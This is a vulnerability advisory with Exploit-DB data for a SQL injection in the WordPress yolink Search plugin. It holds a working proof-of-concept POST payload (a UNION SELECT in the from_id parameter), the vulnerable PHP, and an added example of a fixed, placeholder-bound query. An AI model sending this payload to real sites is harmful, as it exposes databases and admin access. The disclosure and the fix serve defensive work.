Vendor: yolink Search
By: Miroslav Stampar
CVSS: 9 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: yolink Search
Affected Version From: 1.1.2004
Affected Version To: 1.1.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:yolink_search
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability

The vulnerability exists due to misuse of $wpdb->prepare() in the bulkcrawl.php script: the POST parameters from_id and batch_size are interpolated directly into the query string rather than bound through placeholders, so prepare() offers no protection and arbitrary SQL can be injected into the query. This can be exploited to disclose the content of the database, to gain access to the administrative panel, etc.

Mitigation:

Upgrade to the latest version of the plugin.

Exploit-DB raw data:

# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip
# Version: 1.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php
 page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1

---------------
Vulnerable code
---------------
$post_type_in = array();

if( isset( $_POST['page'] ) )
{
    $post_type_in[] = '"page"';
}
if( isset( $_POST['post'] ) )
{
    $post_type_in[] = '"post"';
}
$post_type_in = '(' . implode(',', $post_type_in) . ')';
$id_from = $_POST['from_id'];
$batch_size = $_POST['batch_size'];

$post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)
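The description above and the vulnerable snippet both come down to the same defect: $wpdb->prepare() is handed a query string with the request values already concatenated in and no arguments to bind, so it has nothing left to escape. The following is an added example, not code from the plugin or from the advisory author, showing the same query built the way $wpdb->prepare() is meant to be used. It assumes it runs inside WordPress (global $wpdb available) and that the caller has already checked a nonce and the user's capability before reaching this point; the function name yolink_example_fetch_posts and the default batch size of 50 and cap of 500 are assumptions for the example.

```php
<?php
// Added example (not the plugin's own code): fetching the next batch of
// published posts with every request value bound through a placeholder.

function yolink_example_fetch_posts( array $post ) {
    global $wpdb;

    // 1. Post types come from a fixed whitelist keyed on which POST flags are
    //    present; the request never contributes a string to the SQL.
    $post_type_in = array();
    if ( isset( $post['page'] ) ) {
        $post_type_in[] = 'page';
    }
    if ( isset( $post['post'] ) ) {
        $post_type_in[] = 'post';
    }
    if ( empty( $post_type_in ) ) {
        return array(); // nothing selected, nothing to query
    }

    // 2. Numeric inputs are cast and bounded before they reach the query.
    //    (int) on the PoC value "-1 UNION ALL SELECT ..." yields -1, which is
    //    then clamped; the rest of the payload never reaches MySQL.
    $id_from    = isset( $post['from_id'] ) ? (int) $post['from_id'] : 0;
    $batch_size = isset( $post['batch_size'] ) ? (int) $post['batch_size'] : 50; // assumed default
    if ( $id_from < 0 ) {
        $id_from = 0;
    }
    $batch_size = max( 1, min( $batch_size, 500 ) ); // assumed upper bound

    // 3. The only thing interpolated into the SQL text is a list of %s
    //    placeholders sized to the whitelist; values are passed as arguments.
    $placeholders = implode( ',', array_fill( 0, count( $post_type_in ), '%s' ) );
    $args         = array_merge( $post_type_in, array( $id_from, $batch_size ) );

    $sql = $wpdb->prepare(
        "SELECT ID, guid FROM {$wpdb->posts}
         WHERE post_status = 'publish'
           AND post_type IN ($placeholders)
           AND ID > %d
         ORDER BY ID ASC
         LIMIT %d",
        $args
    );

    return $wpdb->get_results( $sql );
}

// Usage inside a request handler, after nonce and capability checks:
// $post_recs = yolink_example_fetch_posts( $_POST );
```

The two changes that matter are the cast to int (which by itself already defeats the UNION payload shown in the PoC) and moving every value out of the query string and into prepare()'s argument list, so that a future non-numeric parameter gets the same treatment. $wpdb->prepare() accepts the arguments either as separate parameters or, as here, as a single array.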